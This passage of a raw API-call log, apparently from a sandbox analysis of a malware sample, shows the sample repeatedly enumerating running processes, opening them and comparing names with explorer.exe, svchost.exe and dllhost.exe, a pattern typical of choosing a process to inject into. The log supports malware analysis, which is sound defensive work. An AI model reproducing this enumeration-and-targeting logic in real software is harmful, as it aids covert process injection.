lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0184.562] CloseHandle (hObject=0xe8) returned 1 [0184.562] Sleep (dwMilliseconds=0x3e8) [0185.573] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0185.575] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0185.575] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0185.576] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0185.576] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0185.577] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0185.577] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0185.578] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0185.578] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0185.578] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0185.579] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0185.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0185.579] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0185.580] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0185.580] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0185.581] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0185.581] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0185.582] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0185.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0185.582] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0185.583] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0185.583] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0185.584] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.584] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.584] CloseHandle (hObject=0xec) returned 1 [0185.584] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0185.584] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0185.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0185.585] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.585] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.585] CloseHandle (hObject=0xec) returned 1 [0185.585] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0185.586] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0185.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0185.586] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0185.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0185.587] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.587] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.587] CloseHandle (hObject=0xec) returned 1 [0185.587] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0185.587] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0185.587] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0185.587] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0185.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0185.587] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.587] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.587] CloseHandle (hObject=0xec) returned 1 [0185.588] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0185.588] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0185.588] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0185.588] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0185.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0185.588] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.588] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.588] CloseHandle (hObject=0xec) returned 1 [0185.588] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0185.588] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0185.588] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0185.588] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0185.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0185.589] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.589] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.589] CloseHandle (hObject=0xec) returned 1 [0185.589] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0185.589] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0185.589] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0185.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0185.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0185.589] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.589] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.589] CloseHandle (hObject=0xec) returned 1 [0185.590] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0185.590] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0185.590] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0185.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0185.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0185.590] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.590] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.590] CloseHandle (hObject=0xec) returned 1 [0185.590] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0185.590] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0185.590] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0185.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0185.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0185.591] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.591] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.591] CloseHandle (hObject=0xec) returned 1 [0185.591] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0185.591] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0185.591] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0185.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0185.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0185.591] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.591] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.592] CloseHandle (hObject=0xec) returned 1 [0185.592] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0185.592] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0185.592] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0185.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0185.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0185.592] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.592] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.592] CloseHandle (hObject=0xec) returned 1 [0185.592] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0185.592] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0185.592] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0185.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0185.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0185.593] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.593] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.593] CloseHandle (hObject=0xec) returned 1 [0185.593] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0185.593] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0185.593] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0185.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0185.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0185.593] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.594] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.594] CloseHandle (hObject=0xec) returned 1 [0185.594] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0185.594] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0185.594] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0185.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0185.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0185.594] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.594] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.594] CloseHandle (hObject=0xec) returned 1 [0185.594] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0185.594] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0185.594] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0185.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0185.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0185.595] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.595] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.595] CloseHandle (hObject=0xec) returned 1 [0185.595] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0185.595] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0185.595] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0185.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0185.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0185.596] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.596] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.596] CloseHandle (hObject=0xec) returned 1 [0185.596] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0185.596] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0185.596] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0185.596] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0185.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0185.596] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.596] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.596] CloseHandle (hObject=0xec) returned 1 [0185.596] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0185.596] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0185.596] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0185.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0185.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0185.597] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.597] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.597] CloseHandle (hObject=0xec) returned 1 [0185.597] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0185.597] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0185.597] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0185.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0185.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0185.598] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.598] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.598] CloseHandle (hObject=0xec) returned 1 [0185.598] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0185.598] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0185.598] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0185.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0185.598] OpenProcess 